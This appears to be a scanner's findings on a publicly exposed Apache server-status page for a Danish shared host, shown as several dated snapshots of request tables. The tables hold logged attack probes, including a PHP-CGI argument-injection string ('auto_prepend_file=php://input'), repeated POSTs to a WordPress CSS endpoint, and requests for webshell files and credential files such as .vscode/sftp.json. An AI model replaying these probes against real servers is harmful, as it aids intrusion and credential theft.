15-8343880/4/948_ 0.00730.00.000.38 66.249.70.104webhotel5.webhosting.dkGET / HTTP/1.0 16-8343990/4/897_ 0.00700.00.001.70 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-8344240/4/897_ 0.01720.00.000.41 66.249.70.103webhotel5.webhosting.dkGET / HTTP/1.0 18-8344250/4/897_ 0.01600.00.000.37 66.249.70.102webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 19-8344280/4/847_ 0.00530.00.000.48 66.249.64.130www.tutak.dk/volga/volga/volga2/slides/079%20Frilandsmuseum_t.html HTTP/1.0 20-8347670/3/893_ 0.00310.00.000.40 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 21-7-0/0/839. 0.06104400.00.000.86 154.47.21.182webhotel5.webhosting.dkGET /wp-content/plugins/random/ HTTP/1.0 22-7-0/0/835. 0.07104300.00.000.34 154.47.21.182webhotel5.webhosting.dkGET /wp-content/plugins/ubh/ HTTP/1.0 23-7-0/0/833. 0.06104300.00.000.76 154.47.21.182webhotel5.webhosting.dkGET /wp-content/plugins/Uwogh-Segs/ HTTP/1.0 24-7-0/0/832. 0.0663800.00.000.59 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-8343110/10/797_ 0.01000.00.020.41 138.68.144.227webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 26-8343130/5/781W 0.00000.00.000.62 138.68.144.227webhotel5.webhosting.dkGET /server-status HTTP/1.0 27-8343190/5/722_ 0.001100.00.000.49 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-8343200/5/721_ 0.011000.00.001.49 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-8343210/6/721_ 0.01900.00.000.34 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-8343300/5/770_ 0.01000.00.000.32 138.68.144.227webhotel5.webhosting.dkGET /about HTTP/1.0 31-7-0/0/724. 0.07104400.00.000.38 154.47.21.182webhotel5.webhosting.dkGET /wp-content/plugins/owfsmac/ HTTP/1.0 32-8343220/4/661_ 0.00800.00.000.33 66.249.70.104webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 33-8343230/5/648_ 0.00510.00.020.31 31.160.63.113webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 34-8343240/5/645_ 0.00300.00.000.75 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-8343250/5/470_ 0.00120.00.000.25 138.68.144.227webhotel5.webhosting.dkGET / HTTP/1.0 36-7-0/0/453. 0.0422100.00.000.53 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-7-0/0/375. 0.0322100.00.000.10 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-7-0/0/304. 0.0422100.00.000.20 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-7-0/0/254. 0.0422100.00.000.15 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-7-0/0/204. 0.0522100.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-7-0/0/130. 0.0322100.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-7-0/0/130. 0.0222100.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-7-0/0/130. 0.0422100.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-7-0/0/130. 0.0322100.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-7-0/0/130. 0.0422100.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-7-0/0/130. 0.0522100.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-6-0/0/100. 0.07543000.00.000.03 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 48-3-0/0/50. 0.071531616690.00.000.02 193.176.211.34webhotel5.webhosting.dkGET /sym.php HTTP/1.0 49-3-0/0/50. 0.071531614520.00.000.02 81.19.232.105www.woodwind.dkGET /images/Lebayle%20LRIII%204.jpg HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginni
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde33b5eb5ee
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 24-Jun-2024 17:48:17 CEST Restart Time: Monday, 24-Jun-2024 16:05:04 CEST Parent Server Generation: 1 Server uptime: 1 hour 43 minutes 12 seconds Total accesses: 7182 - Total Traffic: 3.8 MB CPU Usage: u1.19 s.69 cu0 cs0 - .0304% CPU load 1.16 requests/sec - 648 B/second - 559 B/request 1 requests currently being processed, 33 idle workers ___________W_____________._________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1633540/41/219_ 0.052500.00.010.07 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-1633670/41/219_ 0.042400.00.010.24 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-1633700/41/219_ 0.052400.00.020.14 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-1633680/41/219_ 0.042400.00.010.08 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 4-1633710/41/219_ 0.062400.00.010.10 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-1633720/41/219_ 0.052300.00.020.12 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-1634350/41/219_ 0.05000.00.010.06 206.81.24.227webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 7-1634360/41/219_ 0.05000.00.010.10 206.81.24.227webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 8-1634370/41/219_ 0.05000.00.020.11 206.81.24.227webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 9-1634750/41/219_ 0.04000.00.020.11 206.81.24.227webhotel5.webhosting.dkGET /about HTTP/1.0 10-1634800/41/219_ 0.05000.00.020.07 206.81.24.227webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 11-1634810/39/217W 0.05000.00.020.07 206.81.24.227webhotel5.webhosting.dkGET /server-status HTTP/1.0 12-1635550/40/218_ 0.063320.00.060.11 44.211.26.178webhotel5.webhosting.dkGET / HTTP/1.0 13-1636080/40/218_ 0.053000.00.010.06 81.19.232.105webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 14-1636090/40/218_ 0.053000.00.010.08 81.19.232.105webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 15-1636100/40/218_ 0.062500.00.020.07 81.19.232.105webhotel5.webhosting.dkGET /product/black-bowl/ HTTP/1.0 16-1640240/40/218_ 0.041100.00.010.15 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-1637830/40/218_ 0.0421440.00.010.08 198.235.24.166webhotel5.webhosting.dkGET / HTTP/1.0 18-1637860/40/218_ 0.051900.00.010.11 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-1637870/40/218_ 0.0418150.00.140.19 81.19.232.105www.woodwind.dkGET /robots.txt HTTP/1.0 20-1638550/40/218_ 0.041300.00.640.74 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-1640850/40/217_ 0.058310.00.020.07 81.19.232.100webhotel5.webhosting.dkGET /server-status HTTP/1.0 22-1641180/40/217_ 0.04000.00.010.08 206.81.24.227webhotel5.webhosting.dkGET /server HTTP/1.0 23-1641340/40/218_ 0.05000.00.020.08 206.81.24.227webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 24-1643040/39/216_ 0.043210.00.020.17 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 25-1-0/0/177. 0.0732600.00.000.06 156.146.38.136webhotel5.webhosting.dkGET /wp-content/themes/about.php HTTP/1.0 26-1633730/41/168_ 0.042200.00.010.06 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-1634880/40/166_ 0.053900.00.020.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-1634890/40/149_ 0.043800.00.020.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-1634900/40/140_ 0.043500.00.010.04 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-1647730/38/138_ 0.04800.00.010.06 12.236.123.99webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 31-1647840/38/138_ 0.05600.00.010.04 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-1647850/38/138_ 0.05120.00.010.03 206.81.24.227webhotel5.webhosting.dkGET / HTTP/1.0 33-1647860/38/138_ 0.03030.00.010.07 206.81.24.227webhotel5.webhosting.dkGET / HTTP/1.0 34-1634910/40/90_ 0.033300.00.010.02 44.211.26.178webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 35-0-0/0/50. 0.07330700.00.000.03 167.71.210.253webhotel5.webhosting.dkGET /blog/wp-content/plugins/fix/ HTTP/1.0 36-1-0/0/78. 0.06190520.00.000.02 66.249.64.45www.abstrax.dkGET /index.html HTTP/1.0 37-1-0/0/78. 0.06190400.00.000.02 81.19.232.105webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 38-1-0/0/78. 0.06189800.00.000.02 188.166.67.239webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3d61dd0e5
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 22-Jun-2024 18:35:13 CEST Restart Time: Saturday, 22-Jun-2024 04:00:06 CEST Parent Server Generation: 14 Server uptime: 14 hours 35 minutes 7 seconds Total accesses: 42457 - Total Traffic: 37.7 MB CPU Usage: u1.57 s.63 cu0 cs0 - .00419% CPU load .809 requests/sec - 752 B/second - 930 B/request 1 requests currently being processed, 31 idle workers ________________W_____________...__............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-14292650/33/1279_ 0.064000.00.050.96 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-14292210/35/1285_ 0.0534130.00.151.54 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 2-14292360/34/1283_ 0.08160.00.090.76 147.185.132.192webhotel5.webhosting.dkGET / HTTP/1.0 3-14292350/34/1274_ 0.04200.00.010.67 139.162.96.14webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 4-14292220/35/1280_ 0.062200.00.105.38 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-14292230/34/1278_ 0.052900.00.031.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-14292690/33/1275_ 0.054300.00.030.94 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-14292240/34/1275_ 0.062400.00.020.53 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-14292810/33/1268_ 0.072850.00.293.61 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 9-14292250/34/1275_ 0.062300.00.010.66 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 10-14292260/34/1273_ 0.061650.00.020.61 139.162.96.14webhotel5.webhosting.dkGET / HTTP/1.0 11-14292270/34/1221_ 0.062150.00.120.67 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 12-14292280/34/1270_ 0.061300.00.011.01 141.98.11.166webhotel5.webhosting.dkGET /js/tinymce/plugins/fileman/php/upload.php HTTP/1.0 13-14292370/34/1270_ 0.07100.00.011.29 81.19.232.105webhotel5.webhosting.dk/9/labelm-powder-red-spray---150ml-box-400x400x100.jpg HTTP/1.0 14-14292290/34/1268_ 0.06600.00.021.15 139.162.96.14webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 15-14292390/33/1264_ 0.055300.00.021.71 95.159.102.62webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 16-14292400/33/1262W 0.07000.00.010.99 139.162.96.14webhotel5.webhosting.dkGET /server-status HTTP/1.0 17-14292410/33/1241_ 0.065920.00.010.98 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-14292300/34/1189_ 0.06400.00.100.76 139.162.96.14webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 19-14292890/33/1235_ 0.063900.00.022.00 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-14292990/33/1202_ 0.073900.00.020.98 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-14293010/33/1083_ 0.053800.00.030.73 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-14292310/34/1076_ 0.07500.00.081.18 139.162.96.14webhotel5.webhosting.dkGET /server HTTP/1.0 23-14293050/33/1046_ 0.053800.00.020.60 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-14293060/33/1034_ 0.053800.00.020.51 194.38.23.16webhotel5.webhosting.dkp?option=com_acym&ctrl=frontmails&task=setNewIconShare HTTP/1.0 25-14293170/33/1094_ 0.053700.00.020.64 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-14293260/32/1110_ 0.062500.00.020.58 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-14293590/32/1088_ 0.07730.00.010.71 139.162.96.14webhotel5.webhosting.dkGET / HTTP/1.0 28-14292320/34/1072_ 0.05400.00.010.53 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-14347260/15/962_ 0.01300.00.000.41 139.162.96.14webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 30-13-0/0/940. 0.01210800.00.000.49 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 31-13-0/0/977. 0.01210800.00.000.69 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 32-13-0/0/912. 0.08344220.00.000.72 198.235.24.181webhotel5.webhosting.dkGET / HTTP/1.0 33-14292330/34/860_ 0.05100.00.020.39 139.162.96.14webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 34-14292340/34/669_ 0.05400.00.030.36 139.162.96.14webhotel5.webhosting.dkGET /about HTTP/1.0 35-11-0/0/563. 0.03930700.00.000.27 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-11-0/0/405. 0.04930700.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-11-0/0/288. 0.03930700.00.000.16 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-11-0/0/223. 0.03930700.00.000.10 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-11-0/0/147. 0.02930700.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-11-0/0/85. 0.02930700.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-11-0/0/84. 0.02930700.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-11-0/0/85. 0.02930700.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-11-0/0/85. 0.02930700.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-11-0/0/84. 0.03930700.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-11-0/0/18. 0.02930700.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde36afa1cef
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 21-Jun-2024 00:38:40 CEST Restart Time: Thursday, 20-Jun-2024 16:05:04 CEST Parent Server Generation: 8 Server uptime: 8 hours 33 minutes 36 seconds Total accesses: 27552 - Total Traffic: 16.8 MB CPU Usage: u2.01 s.97 cu0 cs0 - .00967% CPU load .894 requests/sec - 571 B/second - 639 B/request 1 requests currently being processed, 45 idle workers ________W_____________________________________.................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-8258210/46/806_ 0.082600.00.030.38 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-8258220/46/808_ 0.0624520.00.020.39 49.51.179.103www.vennegaard.comGET / HTTP/1.0 2-8258230/45/807_ 0.074200.00.031.18 145.239.10.137webhotel5.webhosting.dkGET /pub/503.php HTTP/1.0 3-8258240/46/808_ 0.064500.00.020.33 91.92.243.120webhotel5.webhosting.dkGET /wp-admin/inputs.php HTTP/1.0 4-8258330/45/802_ 0.084900.00.050.41 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-8258320/45/803_ 0.084800.00.070.54 172.56.240.159webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 6-8258380/45/805_ 0.074830.00.070.38 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 7-8258250/46/808_ 0.074200.00.020.34 145.239.10.137webhotel5.webhosting.dkGET /503.php HTTP/1.0 8-8258260/45/804W 0.08000.00.050.37 138.68.82.23webhotel5.webhosting.dkGET /server-status HTTP/1.0 9-8258270/46/804_ 0.074700.00.060.42 145.239.10.137webhotel5.webhosting.dkGET /composere.php HTTP/1.0 10-8258280/44/803_ 0.074200.00.020.36 172.56.240.160webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 11-8258290/45/801_ 0.074200.00.320.75 145.239.10.137webhotel5.webhosting.dkGET /pub/ups.php HTTP/1.0 12-8258300/45/797_ 0.064200.00.020.34 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-8258310/45/801_ 0.074800.00.050.41 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-8258390/45/753_ 0.074700.00.020.34 145.239.10.137webhotel5.webhosting.dkGET /web_system.php HTTP/1.0 15-8258680/43/751_ 0.074700.00.020.31 145.239.10.137webhotel5.webhosting.dkGET /composer.php HTTP/1.0 16-8258710/45/751_ 0.074100.00.020.38 145.239.10.137webhotel5.webhosting.dkGET /pub/errors/plusad.php HTTP/1.0 17-8258730/45/773_ 0.084200.00.030.50 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-8258740/45/750_ 0.063600.00.030.33 75.209.6.140webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 19-8258760/45/746_ 0.064100.00.020.40 145.239.10.137webhotel5.webhosting.dkGET /ups.php HTTP/1.0 20-8258810/45/751_ 0.063200.00.020.45 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-8258940/45/751_ 0.073600.00.030.33 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-8259040/45/733_ 0.072700.00.160.57 91.92.243.120webhotel5.webhosting.dkGET /wp-content/themes/inputs.php HTTP/1.0 23-8303870/39/732_ 0.052000.00.030.41 81.19.232.105webhotel5.webhosting.dkGET /cache/1405558/fit-800x800x100.webp HTTP/1.0 24-8304020/39/724_ 0.061800.00.020.45 91.92.243.120webhotel5.webhosting.dkGET /wp-content/inputs.php HTTP/1.0 25-8304060/39/724_ 0.05500.00.021.47 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-8258140/48/695_ 0.074100.00.030.32 145.239.10.137webhotel5.webhosting.dkGET /pub/errors/init.php HTTP/1.0 27-8258150/44/691_ 0.065000.00.030.63 40.77.167.24webhotel5.webhosting.dk&publicationName=temp&issueName=Issue_16_2018&page=168 HTTP/1.0 28-8258160/46/680_ 0.074000.00.040.41 91.92.243.120webhotel5.webhosting.dkGET /images/inputs.php HTTP/1.0 29-8258170/46/703_ 0.062600.00.030.31 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-8258180/46/656_ 0.072600.00.030.44 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-8258190/46/539_ 0.072600.00.030.28 81.19.232.105webhotel5.webhosting.dk/xnxxcom.club/se/?query%3Ddancing%20bear%20porn%20free HTTP/1.0 32-8258200/46/558_ 0.0825180.00.020.24 5.188.62.21webhotel5.webhosting.dkGET / HTTP/1.0 33-8304070/39/527_ 0.05200.00.020.40 165.232.180.139webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 34-8304080/39/536_ 0.05100.00.020.27 91.92.243.120webhotel5.webhosting.dkGET /cgi-bin/inputs.php HTTP/1.0 35-8304090/39/339_ 0.05000.00.020.13 138.68.82.23webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 36-8304100/39/371_ 0.06230.00.020.14 138.68.82.23webhotel5.webhosting.dkGET / HTTP/1.0 37-8304110/39/284_ 0.06140.00.020.14 138.68.82.23webhotel5.webhosting.dkGET / HTTP/1.0 38-8304130/39/153_ 0.06000.00.020.20 138.68.82.23webhotel5.webhosting.dkGET /server HTTP/1.0 39-8304140/39/140_ 0.07010.00.020.05 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 40-8304150/39/89_ 0.05000.00.020.06 138.68.82.23webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 41-8304160/39/89_ 0.05000.00.020.08 138.68.82.23webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 42-8304170/39/89_ 0.07000.00.020.04 138.68.82.23webhotel5.webhosting.dkGET /about HTTP/1.0 43-8304180/39/89_ 0.05000.00.020.06 138.68.82.23webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 44-8304190/39/89_ 0.06000.00.020.05 138.68.82.23webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 45-8304200/39/39_ 0.06000.00.020.02 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3bcfc155b
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 18-Jun-2024 21:49:44 CEST Restart Time: Tuesday, 18-Jun-2024 06:05:05 CEST Parent Server Generation: 15 Server uptime: 15 hours 44 minutes 39 seconds Total accesses: 65421 - Total Traffic: 57.5 MB CPU Usage: u1.49 s.74 cu0 cs0 - .00393% CPU load 1.15 requests/sec - 1063 B/second - 921 B/request 1 requests currently being processed, 34 idle workers ________________W__________________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-15346690/48/2018_ 0.052300.00.011.44 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-15346710/47/1999_ 0.044500.00.011.14 40.77.167.7webhotel5.webhosting.dkdex=5&querydesc=SearchJobQueryDescription&viewedfrom=1 HTTP/1.0 2-15346810/47/1965_ 0.044000.00.011.57 94.156.66.180www.lillekrabbe.dkGET /wp-content/themes/index.php HTTP/1.0 3-15346820/47/1955_ 0.043540.00.011.94 63.143.42.253webhotel5.webhosting.dkHEAD / HTTP/1.0 4-15346720/47/1988_ 0.044400.00.011.39 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-15347310/45/1956_ 0.043000.00.012.68 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-15346830/47/1980_ 0.043200.00.011.23 94.156.66.180www.lillekrabbe.dkGET /wp-content/plugins/index.php HTTP/1.0 7-15346840/47/1977_ 0.053020.00.011.48 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 8-15346870/46/1971_ 0.04000.00.011.16 164.90.208.56webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 9-15355410/12/1906_ 0.011510.00.002.93 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 10-15346880/46/1970_ 0.04000.00.011.34 164.90.208.56webhotel5.webhosting.dkGET /server HTTP/1.0 11-15346890/46/1844_ 0.05000.00.011.65 164.90.208.56webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 12-15346900/46/1963_ 0.05000.00.011.82 164.90.208.56webhotel5.webhosting.dkGET /about HTTP/1.0 13-15346910/46/1964_ 0.04000.00.011.97 164.90.208.56webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 14-15346920/46/1933_ 0.04000.00.012.17 164.90.208.56webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 15-15346930/46/1963_ 0.04000.00.011.72 164.90.208.56webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 16-15346940/45/1943W 0.05000.00.012.70 164.90.208.56webhotel5.webhosting.dkGET /server-status HTTP/1.0 17-15347320/45/1942_ 0.042300.00.011.08 81.19.232.105webhotel5.webhosting.dkPOST 